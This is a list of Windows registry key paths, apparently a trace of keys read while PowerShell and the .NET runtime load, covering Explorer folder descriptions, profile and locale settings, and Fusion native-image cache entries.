HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\PropertyBag
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Recent
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_JumpListItems
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_JumpListItems
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\PropertyBag
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-120665959-548228820-2376508522-1001
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-120665959-548228820-2376508522-1001\ProfileImagePath
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\Rpc
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsHistory
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackDocs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackDocs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine\PowerShellVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine\RuntimeVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine\ConsoleHostAssemblyName
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\v4.0
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\InstallRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\CLRLoadLogDir
HKEY_CURRENT_USER\Software\Microsoft\.NETFramework
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\OnlyUseLatestCLR
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide\AssemblyStorageRoots
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\GCStressStart
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\GCStressStartAtJit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\DisableConfigCache
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\AppPatch
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\AppPatch\v4.0.30319.00000
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\AppPatch\v4.0.30319.00000\mscorwks.dll
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB
HKEY_CURRENT_USER\Software\Microsoft\Fusion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\VersioningLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets\Internet
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets\LocalIntranet
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\v2.0.50727\Security\Policy
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\LatestIndex
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\index169
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\index169\NIUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\index169\ILUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\181938c6\7950e2c5
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\181938c6\7950e2c5\82
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\181938c6\7950e2c5\82\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\181938c6\7950e2c5\82\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\181938c6\7950e2c5\82\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\181938c6\7950e2c5\82\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\181938c6\7950e2c5\82\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\181938c6\7950e2c5\82\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\181938c6\7950e2c5\82\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\181938c6\7950e2c5\82\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\181938c6\7950e2c5\82\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7950e2c5\19b8f67f\82
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7950e2c5\19b8f67f\82\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7950e2c5\19b8f67f\82\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7950e2c5\19b8f67f\82\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7950e2c5\19b8f67f\82\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7950e2c5\19b8f67f\82\LastModTime
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\GACChangeNotification\Default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\mscorlib,2.0.0.0,,b77a5c561934e089,AMD64
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-US
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-US
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\PublisherPolicy\Default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index23
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.Microsoft.PowerShell.ConsoleHost__31bf3856ad364e35
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\13b06edc\3d40437
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\13b06edc\3d40437\3b
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\13b06edc\3d40437\3b\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\13b06edc\3d40437\3b\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\13b06edc\3d40437\3b\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\13b06edc\3d40437\3b\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\13b06edc\3d40437\3b\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\13b06edc\3d40437\3b\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\13b06edc\3d40437\3b\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\13b06edc\3d40437\3b\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\13b06edc\3d40437\3b\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\5569937f\21247651\3e
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\5569937f\21247651\3e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\5569937f\21247651\3e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\5569937f\21247651\3e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\5569937f\21247651\3e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\5569937f\21247651\3e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\73843e06\43a920ef\6e
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\73843e06\43a920ef\6e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\73843e06\43a920ef\6e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\73843e06\43a920ef\6e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\73843e06\43a920ef\6e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\73843e06\43a920ef\6e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\19ab8d57\1bd7b0d8\8f
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\19ab8d57\1bd7b0d8\8f\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\19ab8d57\1bd7b0d8\8f\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\19ab8d57\1bd7b0d8\8f\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\19ab8d57\1bd7b0d8\8f\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\19ab8d57\1bd7b0d8\8f\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3d40437\3f3fc448\3b
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3d40437\3f3fc448\3b\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3d40437\3f3fc448\3b\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3d40437\3f3fc448\3b\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3d40437\3f3fc448\3b\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3d40437\3f3fc448\3b\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\30bc7c4f\3f50fe4f\90
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\30bc7c4f\3f50fe4f\90\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\30bc7c4f\3f50fe4f\90\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\30bc7c4f\3f50fe4f\90\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\30bc7c4f\3f50fe4f\90\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\30bc7c4f\3f50fe4f\90\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\30bc7c4f\3f50fe4f\90\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\30bc7c4f\3f50fe4f\90\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\30bc7c4f\3f50fe4f\90\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\30bc7c4f\3f50fe4f\90\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\424bd4d8\1c83327b\8e
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\424bd4d8\1c83327b\8e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\424bd4d8\1c83327b\8e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\424bd4d8\1c83327b\8e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\424bd4d8\1c83327b\8e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\424bd4d8\1c83327b\8e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3f50fe4f\6f1da7aa\90
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3f50fe4f\6f1da7aa\90\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3f50fe4f\6f1da7aa\90\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3f50fe4f\6f1da7aa\90\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3f50fe4f\6f1da7aa\90\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3f50fe4f\6f1da7aa\90\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Microsoft.PowerShell.ConsoleHost,1.0.0.0,,31bf3856ad364e35,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Xml__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Xml,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Configuration__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Configuration,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Configuration.Install__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Configuration.Install,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.System.Management.Automation__31bf3856ad364e35
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Management.Automation,1.0.0.0,,31bf3856ad364e35,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\APTCA
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\130e9a23\5569937f
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\130e9a23\5569937f\3e
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\130e9a23\5569937f\3e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\130e9a23\5569937f\3e\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\130e9a23\5569937f\3e\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\130e9a23\5569937f\3e\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\130e9a23\5569937f\3e\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\130e9a23\5569937f\3e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\130e9a23\5569937f\3e\ILDependencies
